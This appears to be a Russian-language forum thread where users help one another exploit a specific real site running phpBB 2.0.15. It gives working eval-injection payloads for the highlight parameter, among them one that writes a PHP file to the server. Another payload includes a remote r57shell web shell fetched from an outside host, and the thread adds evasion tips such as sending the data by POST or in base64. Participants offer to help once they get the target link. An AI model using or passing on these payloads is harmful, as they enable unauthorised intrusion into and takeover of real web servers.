somesite.ru Вчера залез посмотреть про хитмана и обнаружил, что форум phpbb 2.0.15 .. =) эксплоит работает, а fopen() и т.д. - нет. делал так: viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight='.eval($_GET[c]).' ничего не работает, что посоветуете? пробовал это же на локалхосте - гуд, почему там не работает? кстати, там виндовс стоит - 2003 сервер, скорее всего &highlight='.passthru(dir).' не пашет тоже. [mod] Ссылки только в личке и Просьбах о взломах [/mod]
viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight='.eval($_GET[c]).' никогда так не делай. Такие данные шли постом, а лучше в base64. давай сцылку на форум, поможем
Я же написал в начале - somesite.ru - форум "нового диска" =) [mod] Ссылки только в личке и Просьбах о взломах [/mod]
попробуй сам - не пашет кроме phpinfo(); и раскрытия пути работает только эксплоит про пасс к базе форума
viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://rst.void.ru/download/r57shell.txt Если не получится пробуй багу с регэкспами.